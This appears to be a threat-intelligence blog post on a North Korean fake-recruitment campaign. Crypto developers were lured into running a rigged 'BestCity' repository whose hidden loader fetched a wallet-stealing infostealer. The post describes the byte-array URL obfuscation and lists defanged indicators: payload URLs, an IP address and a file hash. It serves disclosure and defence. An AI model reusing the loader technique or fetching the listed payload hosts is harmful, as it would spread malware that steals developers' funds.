DPRK “Contagious Interview” BestCity Campaign Targets Crypto Developers via Fake Recruitment Test
- julia05126
- Nov 13
- 2 min read
We have identified a new Contagious Interview repo operated by DPRK that was recently active and successfully compromising cryptocurrency developers. The attackers posed as legitimate recruiters, initiated a convincing hiring process through LinkedIn, and ultimately directed candidates to clone and run a malicious Bitbucket repository — the “BestCity” project. Running this code silently installs BeaverTail-family infostealer malware, leading to theft of browser-based crypto wallets. We have confirmed multiple victim wallet drains in late October.
Background
In the latest Contagious Interview campaign, crypto developers were being approached on LinkedIn by profiles posing as legitimate recruiters. The victims were invited to an interview, sent a calendar link, and then asked to complete a “take-home” coding assignment before the meeting, to clone and run a repo locally to “speed up” the hiring process. That request was the trap: running the repo executed a hidden loader that fetched a malicious payload and compromised browser wallets on the developer computer.
The fake project recently being used is referred to as BestCity pictured below.
BestCity was presented as a harmless demo/web project, hosted on Bitbucket. The repository looks like a normal developer deliverable (React frontend, small Node server, package.json, etc.) and is packaged so it can be shared easily with candidates during an interview process. On the surface it reads like a legitimate coding exercise or demo that a hiring manager might ask an applicant to clone and run locally.
How legitimate platforms are being leveraged
The attackers used legitimate services to make the lure seem trustworthy. The repo itself, now taken down, was hosted on Bitbucket, a well-known source control platform; the second-stage payload was hosted on npoint.io (a legitimate JSON-storage/hosting service). Because both services are commonly used by developers, their presence lowers suspicion — recipients see recognizable domains and assume the artifacts are safe.
zeroShadow investigation
The image below shows the exact lines where the malicious code lived inside the BestCity package. At first glance it looks innocuous — a few lines of numbers and some standard Node APIs — but in context this block is a remote code loader that runs automatically when the controller is loaded.
The small numeric array in the screenshot is just ASCII bytes that, when decoded, spell out a hidden download URL: hxxps[://]api[.]npoint[.]io/2c45861239c3b2031fb9. That URL delivered a heavily-obfuscated JavaScript infostealer (SHA-256 5428407c681c5a82112d4c75ff59967faaebc3933550ed3d88ae0afff8ea98ff) which harvests browser wallet data and exfiltrates it to attacker infrastructure — VirusTotal and multiple vendors flag the sample as a JS infostealer. See the VT entry for the sample here (safe review link):
Blockchain findings
The following graphic shows how one victim's funds were moved on the blockchain. Shortly after the BeaverTail malware was executed, the victim’s assets were rapidly drained from their BNB wallet. The stolen funds were then moved across chains — both native tokens and stablecoins — using several decentralized bridging services, as illustrated in the Chainalysis Reactor (Next Gen Beta) screenshot below.
The stolen assets were subsequently commingled with funds from both unknown sources and wallets previously linked to confirmed Contagious Interview operations. Ultimately, the consolidated funds were bridged to the Tron network as USDT, where they were moved towards cash-out.
Indicators of Compromise
hxxps[://]docs[.]google[.]com/document/d/15b_1_ggtV9Lg3QUl7FhRtdc7qG9rQI2-sSiRz47fxHw
hxxps[://]bitbucket[.]org/0x5softwaredev/demo_version/src/main/
hxxps[://]api[.]npoint[.]io/2c45861239c3b2031fb9
hxxps[://]api[.]npoint[.]io/40f8db39f70e559adcbc
23[.]227[.]203[.]204
Original article by the zeroShadow team